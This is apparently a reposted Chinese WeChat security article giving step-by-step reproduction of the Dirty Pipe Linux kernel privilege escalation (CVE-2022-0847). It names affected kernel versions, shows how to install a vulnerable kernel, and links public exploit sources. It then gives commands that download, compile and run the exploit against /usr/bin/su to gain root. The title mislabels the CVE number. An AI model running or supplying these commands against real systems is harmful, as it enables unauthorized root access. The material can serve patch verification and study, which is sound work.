免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。
漏洞通告:
https://access.redhat.com/security/cve/cve-2022-0847
复现:
利用条件
5.8<=Linux kernel<5.16.11/5.15.25/5.10.102
如果你本地测试环境不满足这个条件,可以在以下链接下载对应文件https://kernel.ubuntu.com/~kernel-ppa/mainline/
然后执行以下命令:
dpkg -i linux-*.deb #安装
update-grub #更新grub
reboot #重启
这样ubuntu内核版本就是5.8.5了。
EXP:
https://haxx.in/files/dirtypipez.c
or
https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
利用:
wget https://haxx.in/files/dirtypipez.c
gcc -o dirtypipez dirtypipez.c
./dirtypipez /usr/bin/su
技术交流
交流群
关注公众号回复“加群”,添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。
原文始发于微信公众号(Z2O安全攻防):最新Linux内核提权漏洞——Dirty Pipe(CVE-2022-0874) 复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论